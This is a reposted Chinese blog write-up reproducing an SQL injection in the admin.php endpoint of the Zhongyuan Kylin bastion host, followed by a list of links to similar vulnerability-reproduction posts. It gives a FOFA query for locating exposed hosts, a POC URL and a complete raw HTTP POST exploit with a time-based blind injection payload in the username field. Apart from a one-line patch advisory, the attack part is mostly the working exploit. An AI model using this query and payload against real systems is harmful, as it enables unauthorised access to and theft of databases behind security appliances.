某堡垒机SQL注入漏洞

7月前作者：故事讲予风听分类：Toy博客阅读(29) 违法举报

这篇具有很好参考价值的文章主要介绍了某堡垒机SQL注入漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

一、概述

中远麒麟堡垒机能够提供细粒度的访问控制,最大限度保护用户资源的安全。麒麟堡垒机存在SQL注入漏洞漏洞。

漏洞等级	高危
漏洞影响	中远麒麟堡垒机
FOFA	cert.subject="Baolei"

二、漏洞危害

中远麒麟堡垒机admin.php接口处存在sql注入漏洞，攻击者可通过该漏洞获取数据库敏感信息及拖库。

三、漏洞复现

登录界面

某堡垒机SQL注入漏洞,漏洞复现,安全,web安全,网络安全,sql

POC:

https://ip:port/admin.php?controller=admin_commonuser

出现此回显，则说明漏洞存在

某堡垒机SQL注入漏洞,漏洞复现,安全,web安全,网络安全,sql

EXP：


POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))ptGN) AND '1'='1

burp启动！！！

sleep5秒

某堡垒机SQL注入漏洞,漏洞复现,安全,web安全,网络安全,sql

sleep10秒

某堡垒机SQL注入漏洞,漏洞复现,安全,web安全,网络安全,sql

四、修复建议

官方已经发布修复补丁，请进行升级。文章来源地址https://www.toymoban.com/news/detail-697883.html

到了这里，关于某堡垒机SQL注入漏洞的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

网络安全全栈培训笔记（53-WEB攻防-通用漏洞&CRLF注入&URL重定向&资源处理拒绝服务）

知识点： 1、CRLF注入-原理检测利用 2、URL重定向-原理检测利用 3、Web拒绝服务-原理检测利用 #下节预告： 1、JSONPCORS跨域 2、域名安全接管劫持 #详细点： 1.CRLF注入漏洞，是因为Wb应用没有对用户输入做严格验证，导致攻击者可以输入一些恶意字符。攻击者一旦向清求行或首部

2024年01月15日
浏览(45)
金山终端安全系统V9.0 SQL注入漏洞复现

金山终端安全系统是一款为企业提供终端防护的安全产品，针对恶意软件、病毒和外部攻击提供防范措施，帮助维护企业数据和网络。金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞，该漏洞是由于金山终端安全系统未对用户的输入进行有效的

2024年02月08日
浏览(28)
亿赛通电子文档安全管理系统 SQL注入漏洞复现

亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加

2024年02月03日
浏览(31)
某堡垒机SQL注入漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。中远麒麟堡垒机能够提供细粒度的访问控制,最大限度保护用户资源的安全。麒麟堡垒机存

2024年02月09日
浏览(29)
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程（特详细）

分享一个非常详细的网络安全笔记，是我学习网安过程中用心写的，可以点开以下链接获取：超详细的网络安全笔记 Apache Tomcat文件包含漏洞（CNVD-2020-10487/CVE-2020-1938）。该漏洞是由于Tomcat AJP协议存在缺陷而导致，攻击者利用该漏洞可通过构造特定参数，读取服务器webapp下的

2024年02月08日
浏览(40)
网络安全--wazuh环境配置及漏洞复现

目录一、wazuh配置二、wazuh案例复现 Virtual Machine (OVA) - Installation alternatives (wazuh.com) 查看自身ip wazuh重启：当我们使用本地的cmd通过ssh一直连接wazuh的时候便会出现十级报错，此次在后台可以明显的看到有爆破的提示扫描，通过分析其具体的数据包以及对应的规则理解到wu

2024年02月11日
浏览(32)
【网络安全】CVE漏洞分析以及复现

漏洞详情 Shiro 在路径控制的时候，未能对传入的 url 编码进行 decode 解码，导致攻击者可以绕过过滤器，访问被过滤的路径。漏洞影响版本 Shiro 1.0.0-incubating 对应 Maven Repo 里面也有【一一帮助安全学习，所有资源获取一一】 ①网络安全学习路线 ②20份渗透测试电子书 ③安全

2024年02月06日
浏览(34)
【网络安全】SQL注入--堆叠注入

堆叠注入就是可以同时执行多条语句，危害较大，利用此漏洞可以进行删库或者修改数据库信息查询存在多少字段使用联合查询获取表名使用联合查询获取字段名称使用堆叠注入添加账号密码

2023年04月09日
浏览(40)
【网络安全】SQL注入--宽字节注入

宽字节注入，在 SQL 进行防注入的时候，一般会开启 gpc，过滤特殊字符。一般情况下开启 gpc 是可以防御很多字符串型的注入，但是如果数据库编码不对，也可以导致 SQL 防注入绕过，达到注入的目的。如果数据库设置宽字节字符集 gbk 会导致宽字节注入，从而逃逸 gpc 前提

2023年04月13日
浏览(47)
Web安全：SQL注入漏洞测试.

SQL注入就是有些恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中，同时程序的本身对用户输入的内容过于相信，没有对用户插入的SQL语句进行任何的过滤，从而直接被SQL语句直接被服务端执行，导致数据库的原有信息泄露，篡改，甚至被删除等风险。 SQL注

2024年02月05日
浏览(41)